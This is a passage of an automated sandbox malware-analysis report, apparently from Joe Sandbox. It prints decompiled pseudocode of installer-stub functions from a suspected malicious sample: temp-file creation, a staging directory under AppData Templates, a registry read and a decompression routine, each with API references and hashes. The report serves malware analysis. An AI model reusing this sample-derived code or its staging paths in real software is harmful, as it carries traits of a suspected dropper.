                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x0040602c
                                                0x00406032
                                                0x00406033
                                                0x00406033
                                                0x00406038
                                                0x00406039
                                                0x0040603c
                                                0x00406041
                                                0x00406044
                                                0x0040604e
                                                0x0040605b
                                                0x0040605f
                                                0x00406067
                                                0x00000000
                                                0x00000000
                                                0x0040606b
                                                0x00000000
                                                0x0040606d
                                                0x0040606d
                                                0x0040606d
                                                0x00406070
                                                0x00406073
                                                0x00406073
                                                0x00406076
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00406044
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-678247507
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                				_t17 = E00405E81(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405E03(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E00405AB5( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405A38( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E00406507(L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless",  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless
                                                • API String ID: 1892508949-4283889662
                                                • Opcode ID: 1cd0b2e927c8f2ecfe34984a16faff9310db89cb10556e45c9539d2a776eb697
                                                • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                                • Opcode Fuzzy Hash: 1cd0b2e927c8f2ecfe34984a16faff9310db89cb10556e45c9539d2a776eb697
                                                • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                				int _v8;
                                                				long _t21;
                                                				long _t24;
                                                				char* _t30;
                                                
                                                				asm("sbb eax, eax");
                                                				_v8 = 0x800;
                                                				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                				_t30 = _a16;
                                                				if(_t21 != 0) {
                                                					L4:
                                                					 *_t30 =  *_t30 & 0x00000000;
                                                				} else {
                                                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                					_t21 = RegCloseKey(_a20); // executed
                                                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                						goto L4;
                                                					}
                                                				}
                                                				return _t21;
                                                			}







                                                0x004063e3
                                                0x004063e5
                                                0x004063fd
                                                0x00406402
                                                0x00406407
                                                0x00406445
                                                0x00406445
                                                0x00406409
                                                0x0040641b
                                                0x00406426
                                                0x0040642c
                                                0x00406437
                                                0x00000000
                                                0x00000000
                                                0x00406437
                                                0x0040644b

                                                APIs
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040663C,80000002), ref: 0040641B
                                                • RegCloseKey.KERNELBASE(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll), ref: 00406426
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 99%
                                                			E00407033() {
                                                				signed int _t530;
                                                				void _t537;
                                                				signed int _t538;
                                                				signed int _t539;
                                                				unsigned short _t569;
                                                				signed int _t579;
                                                				signed int _t607;
                                                				void* _t627;
                                                				signed int _t628;
                                                				signed int _t635;
                                                				signed int* _t643;
                                                				void* _t644;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t530 =  *(_t644 - 0x30);
                                                					if(_t530 >= 4) {
                                                					}
                                                					 *(_t644 - 0x40) = 6;
                                                					 *(_t644 - 0x7c) = 0x19;
                                                					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                					while(1) {
                                                						L145:
                                                						 *(_t644 - 0x50) = 1;
                                                						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                						while(1) {
                                                							L149:
                                                							if( *(_t644 - 0x48) <= 0) {
                                                								goto L155;
                                                							}
                                                							L150:
                                                							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                							 *(_t644 - 0x54) = _t643;
                                                							_t569 =  *_t643;
                                                							_t635 = _t569 & 0x0000ffff;
                                                							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                							if( *(_t644 - 0xc) >= _t607) {
                                                								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                								_t628 = _t627 + 1;
                                                								 *_t643 = _t569 - (_t569 >> 5);
                                                								 *(_t644 - 0x50) = _t628;
                                                							} else {
                                                								 *(_t644 - 0x10) = _t607;
                                                								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                							}
                                                							if( *(_t644 - 0x10) >= 0x1000000) {
                                                								L148:
                                                								_t487 = _t644 - 0x48;
                                                								 *_t487 =  *(_t644 - 0x48) - 1;
                                                								L149:
                                                								if( *(_t644 - 0x48) <= 0) {
                                                									goto L155;
                                                								}
                                                								goto L150;
                                                							} else {
                                                								L154:
                                                								L146:
                                                								if( *(_t644 - 0x6c) == 0) {
                                                									L169:
                                                									 *(_t644 - 0x88) = 0x18;
                                                									L170:
                                                									_t579 = 0x22;
                                                									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                									_t539 = 0;
                                                									L172:
                                                									return _t539;
                                                								}
                                                								L147:
                                                								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                								_t484 = _t644 - 0x70;
                                                								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                								goto L148;
                                                							}
                                                							L155:
                                                							_t537 =  *(_t644 - 0x7c);
                                                							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                							while(1) {
                                                								L140:
                                                								 *(_t644 - 0x88) = _t537;
                                                								while(1) {
                                                									L1:
                                                									_t538 =  *(_t644 - 0x88);
                                                									if(_t538 > 0x1c) {
                                                										break;
                                                									}
                                                									L2:
                                                									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
                                                										case 0:
                                                											L3:
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											L4:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											_t538 =  *( *(_t644 - 0x70));
                                                											if(_t538 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											L5:
                                                											_t542 = _t538 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t581);
                                                											_push(9);
                                                											_pop(_t582);
                                                											_t638 = _t542 / _t581;
                                                											_t544 = _t542 % _t581 & 0x000000ff;
                                                											asm("cdq");
                                                											_t633 = _t544 % _t582 & 0x000000ff;
                                                											 *(_t644 - 0x3c) = _t633;
                                                											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                												L10:
                                                												if(_t641 == 0) {
                                                													L12:
                                                													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t641 = _t641 - 1;
                                                													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                												} while (_t641 != 0);
                                                												goto L12;
                                                											}
                                                											L6:
                                                											if( *(_t644 - 4) != 0) {
                                                												GlobalFree( *(_t644 - 4)); // executed
                                                											}
                                                											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t644 - 4) = _t538;
                                                											if(_t538 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t644 - 0x6c);
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L157:
                                                												 *(_t644 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											L14:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											_t45 = _t644 - 0x48;
                                                											 *_t45 =  *(_t644 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t644 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											L16:
                                                											_t550 =  *(_t644 - 0x40);
                                                											if(_t550 ==  *(_t644 - 0x74)) {
                                                												L20:
                                                												 *(_t644 - 0x48) = 5;
                                                												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											L17:
                                                											 *(_t644 - 0x74) = _t550;
                                                											if( *(_t644 - 8) != 0) {
                                                												GlobalFree( *(_t644 - 8)); // executed
                                                											}
                                                											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                											 *(_t644 - 8) = _t538;
                                                											if(_t538 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                											 *(_t644 - 0x84) = 6;
                                                											 *(_t644 - 0x4c) = _t557;
                                                											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                											goto L132;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t644 - 0x6c);
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L158:
                                                												 *(_t644 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											L22:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											_t67 = _t644 - 0x70;
                                                											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                											if( *(_t644 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t559 =  *_t642;
                                                											_t626 = _t559 & 0x0000ffff;
                                                											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                											if( *(_t644 - 0xc) >= _t596) {
                                                												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                												 *(_t644 - 0x40) = 1;
                                                												_t560 = _t559 - (_t559 >> 5);
                                                												__eflags = _t560;
                                                												 *_t642 = _t560;
                                                											} else {
                                                												 *(_t644 - 0x10) = _t596;
                                                												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                											}
                                                											if( *(_t644 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											} else {
                                                												goto L137;
                                                											}
                                                										case 5:
                                                											L137:
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L168:
                                                												 *(_t644 - 0x88) = 5;
                                                												goto L170;
                                                											}
                                                											L138:
                                                											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                											L139:
                                                											_t537 =  *(_t644 - 0x84);
                                                											L140:
                                                											 *(_t644 - 0x88) = _t537;
                                                											goto L1;
                                                										case 6:
                                                											L25:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L36:
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											L26:
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												L35:
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												L32:
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											L66:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												L68:
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											L67:
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											goto L132;
                                                										case 8:
                                                											L70:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xa;
                                                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                											} else {
                                                												__eax =  *(__ebp - 0x38);
                                                												__ecx =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 0x38) + 0xf;
                                                												 *(__ebp - 0x84) = 9;
                                                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                											}
                                                											goto L132;
                                                										case 9:
                                                											L73:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L90;
                                                											}
                                                											L74:
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											L75:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t259;
                                                											0 | _t259 = _t259 + _t259 + 9;
                                                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                											goto L76;
                                                										case 0xa:
                                                											L82:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L84:
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											L83:
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L89;
                                                										case 0xb:
                                                											L85:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L89:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L90:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
